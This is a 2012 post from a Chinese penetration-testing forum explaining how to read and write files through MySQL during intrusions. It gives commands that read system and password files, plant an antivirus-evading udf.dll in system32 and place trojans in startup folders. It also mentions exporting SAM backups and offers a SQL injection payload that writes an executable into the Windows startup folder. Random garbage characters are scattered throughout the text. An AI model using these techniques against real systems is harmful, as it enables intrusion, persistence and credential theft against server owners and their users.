中国网络渗透测试联盟

标题: mysql下读取文件的几种方式 [打印本页]

作者: admin    时间: 2012-9-13 16:34
标题: mysql下读取文件的几种方式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。
" Y8 x; F5 r$ s% O  y# P思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同 ' M; G. l  H3 h* U0 u- u

* j  s) t1 B! y0 N. P; `* m: Dmysql3.x下
5 g# I$ c# z# c, q0 N# \
/ Z6 W6 @" c3 }4 t' [6 w不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下 4 }1 m: j; P9 g6 k8 p( G5 Y9 y1 x

7 E! @, B) i' l5 Imysql>create table a (cmd text);
5 C5 R  q7 h) h% Amysql>load data infile 'c:\\boot.ini' into table a; - G- {$ m3 Y  D8 m- K; W' @3 d
mysql>select * from a; * @* l0 x8 k0 m

) C# @; C& {0 Mmysql4.x下
5 r" E$ w$ _) @' l
1 Q! }" ^8 A# T( Z2 Pmysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下
; N% h# g7 Q! ~/ G* R- T7 g# V! _* j2 L4 _
mysql>create table a (cmd text);
) `- U5 i. O5 I+ w$ y, @& Dmysql>insert into a (cmd) values (load_file('c:\\boot.ini')); 2 z( r. g9 `# P; }3 H
mysql>select * from a; 1 A3 T7 d0 N; t0 u# e$ Q5 p) U
" _, N" Y# x$ j0 C0 T8 O. d" a
mysql5.x下 9 F. p# l& ~! H. Q  J0 ~& `

$ R/ x. ?& @: P, B. |4 L6 c$ N在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下
- a' {( T( D5 |1 m+ @1 H3 u% \: ?3 q# B4 {
mysql>system cat /etc/passwd
3 [5 G& D! n, k. r7 H2 x# K* z; }

" ]% M' P+ F6 ?( Tmysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。 6 c( G6 @% h8 J. g; A, W9 t$ D

7 d* x, Y: `5 p9 `* l& X
4 C' [& {$ _/ n7 t! M例:把免杀过的udf.dll文件插入系统目录
; J5 }0 z, ]( l' S5 v: r
. ?2 i1 f) t6 ]$ @+ @create table a (cmd LONGBLOB);
6 `9 e+ H- ~3 |) F/ b" H4 R# C# rinsert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll'))); , B1 e. a* V, o7 s, z$ u3 {
SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll'; # R( Q" ^) E# ^) Y2 g

( L. X/ m, R. w其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。 3 V) g* ]2 u: s. f/ c; G9 O

) l: @) [% |5 G
9 ]& G1 O: A4 j6 g# H注入中的语法(未测试)
& u" Q5 U$ [. w/ c4 H3 I- v9 n# K9 \
; B' |1 ~/ S8 s2 D: J
& B0 U3 Q7 h6 Xid=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2